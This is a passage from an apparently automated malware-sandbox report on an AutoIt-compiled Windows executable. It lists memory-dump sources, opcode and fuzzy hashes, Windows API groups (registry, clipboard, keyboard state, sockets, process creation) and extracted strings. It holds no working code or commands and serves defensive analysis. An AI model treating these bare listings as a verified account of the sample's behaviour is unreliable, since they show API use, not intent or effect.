                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID: AutoIt
                                                                                • API String ID: 1986988660-2515660138
                                                                                • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                • Instruction ID: 07aa7d2e6911b7bb776085d51a44018269865b831e1f74d9cc8da74dfd416bd4
                                                                                • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                • Instruction Fuzzy Hash: 9FC1AF71D19FC285E660EB34AD814F8B7A8BF94360F90023AD45D8267DEFBDA151C7A0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 3135491444-1585850449
                                                                                • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                • Instruction ID: a8528c3331549634c5997f3c5827bf99e14f3edec94bd80fda234af32cd9db2f
                                                                                • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                • Instruction Fuzzy Hash: 29414162A08AC296EB70FB30D4806FDA361FB95388FC45032D65C466AEDF7CE594D760
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32 ref: 00007FF79F8BBAA2
                                                                                  • Part of subcall function 00007FF79F8756D4: GetFullPathNameW.KERNEL32(?,00007FF79F8756C1,?,00007FF79F877A0C,?,?,?,00007FF79F87109E), ref: 00007FF79F8756FF
                                                                                  • Part of subcall function 00007FF79F873EB4: GetLongPathNameW.KERNELBASE ref: 00007FF79F873ED8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                • API String ID: 779396738-2360590182
                                                                                • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                • Instruction ID: 73bb95e6a4f64efdd632c2b72461554b702299c2c7fac3cc803fcbf318f422db
                                                                                • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                • Instruction Fuzzy Hash: C2316C62608BC289E760EB21E8406EDB7A4FB49BC4F984135DE8C47B59DF3CD595CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3812282468-0
                                                                                • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                • Instruction ID: 40dc59b93a7595957cbfb081e504773b0466485e15babc5e32827b460624af3b
                                                                                • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                • Instruction Fuzzy Hash: 0E31C162A0C7C297EBB69B3191406F9B798EB44FD4FA84032DE4D0B74ACE2CD655C760
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FA5
                                                                                • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FD3
                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                • Instruction ID: 0522147ae5007a8c3a3279f286d25a57d32f1ae6802e6975d49318e6b4330765
                                                                                • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                • Instruction Fuzzy Hash: 27219F33A1878187D7609F25E440AAEB3E4FB48B94B841131DB9DC3B14DF39E494DB14
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                • Instruction ID: 47ae3ddbe90b32e71ae552be4dd99187a83d46dcf727508d4beebaf87c8ebee0
                                                                                • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                • Instruction Fuzzy Hash: 45E04F20F0478182EFA47B709C897F9A356BF88B51F815438C80E4739ACE3DF4989321
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF79F8AA2E2), ref: 00007FF79F8B3EB0
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF79F8AA2E2), ref: 00007FF79F8B3F15
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free
                                                                                • String ID:
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00007FF79F873756
                                                                                  • Part of subcall function 00007FF79F899334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F899348
                                                                                  • Part of subcall function 00007FF79F8736E8: SystemParametersInfoW.USER32 ref: 00007FF79F873705
                                                                                  • Part of subcall function 00007FF79F8736E8: SystemParametersInfoW.USER32 ref: 00007FF79F873725
                                                                                  • Part of subcall function 00007FF79F8737B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F8737F2
                                                                                  • Part of subcall function 00007FF79F8737B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873807
                                                                                  • Part of subcall function 00007FF79F8737B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F87388D
                                                                                  • Part of subcall function 00007FF79F8737B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF79F873785), ref: 00007FF79F873924
                                                                                • SystemParametersInfoW.USER32 ref: 00007FF79F873797
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorFreeHeapLast
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F8A4970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F8A4999
                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF79F8BC8FE), ref: 00007FF79F87656F
                                                                                Similarity
                                                                                • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3938577545-0
                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF79F894C5C
                                                                                  • Part of subcall function 00007FF79F895600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79F895609
                                                                                  • Part of subcall function 00007FF79F895600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF79F89561A
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1680350287-0
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                Similarity
                                                                                • API ID: Open_onexit
                                                                                • String ID:
                                                                                • API String ID: 3030063568-0
                                                                                • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                • Instruction ID: 5e3137c629a4ae87e90b521523e14820e5593e099046824abef18ac4b7af5ae4
                                                                                • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                • Instruction Fuzzy Hash: 62E0EC60F1A9CB80EA64B77A98C55F893906F95316FD09536C01D82366DE1CE2F59720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentVersionWow64_onexit
                                                                                • String ID:
                                                                                • API String ID: 2932345936-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _onexit
                                                                                • String ID:
                                                                                • API String ID: 572287377-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _onexit
                                                                                • String ID:
                                                                                • API String ID: 572287377-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 1993697042-4164748364
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                                • String ID:
                                                                                • API String ID: 3481653762-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 1218376639-328681919
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                • String ID: P
                                                                                • API String ID: 1208186926-3110715001
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-2439800395
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                • String ID:
                                                                                • API String ID: 3372153169-0
                                                                                Similarity
                                                                                • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                • String ID: default$winsta0$winsta0\default
                                                                                • API String ID: 3202303201-1423368268
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                Similarity
                                                                                • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2880407647-0
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                • String ID:
                                                                                • API String ID: 1015379403-0
                                                                                Similarity
                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                • String ID:
                                                                                • API String ID: 3215588206-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 281475176-2761157908
                                                                                Similarity
                                                                                • API ID: CloseValue$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 3314541760-966354055
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P
                                                                                • API String ID: 0-3110715001
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3232708057-3289030164
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                • Instruction ID: 563c32d7bec06a418d388df72c1dcc75e8e9148a39ab3633ac75baa900adfd40
                                                                                • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                • Instruction Fuzzy Hash: A221AF26B085D291EB70FB30E854BFAA760BBA8758FC04031D96D8396CDE2CD619C720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                Similarity
                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 1255039815-0
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                Similarity
                                                                                • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 4047182710-1173974218
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                Similarity
                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 2649000838-1173974218
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                • String ID: *.*
                                                                                • API String ID: 1927845040-438819550
                                                                                • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                • Instruction ID: 87c893050ea6cefbfa9686622161e4c6c05defe055adae7b1f3dab626e202840
                                                                                • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                • Instruction Fuzzy Hash: 7E51E222608AC298EB60EB34E8456EDA3B0FB547B4F900032DE5D43799DF3CE559D760
                                                                                Strings
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-2187161917
                                                                                • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                • Instruction ID: febfbd4bd5da16684abdd58228fd3a63eeba65e482919b080c15c091741a92ea
                                                                                • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                • Instruction Fuzzy Hash: F8B2E372E186D286EBB49F759404AFCB7A1FB45788F904035DE4D57B84DF38E8A0A720
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                • Instruction ID: 6e9039e2756efb1608ffb35b229c3fc76e9f5341dbabe92b0463cdd5948d4d8c
                                                                                • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                • Instruction Fuzzy Hash: 5F51D322B086D281DB60FB379404AFDABA0BB89FE4F948531DE5D4B796CE3CD1509790
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 3769357847-24824748
                                                                                • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                • Instruction ID: 5484a12962edd9a54de10fb036191f0c3672c726f89b0343808008a2b2a0780e
                                                                                • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                • Instruction Fuzzy Hash: AED19D76B04A8689EB60EF36C081AEC77B0FB98B88B944132CE0D57B59DF39D455D360
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: !$VUUU$fmod
                                                                                • API String ID: 1757819995-2579133210
                                                                                • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                • Instruction ID: 99beb781f672d69de4dcfaa2fa82198f1da9ec50c94bef2fafdff52997e76e9d
                                                                                • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                • Instruction Fuzzy Hash: 3AB10821A1DFC545D6F39A3450113FAF259EFAA390F50C332E96E35AA4EF2CE5929700
                                                                                APIs
                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F8B2D60
                                                                                  • Part of subcall function 00007FF79F8AB184: GetCurrentProcess.KERNEL32(00007FF79F8AB21D), ref: 00007FF79F8AB1B1
                                                                                Strings
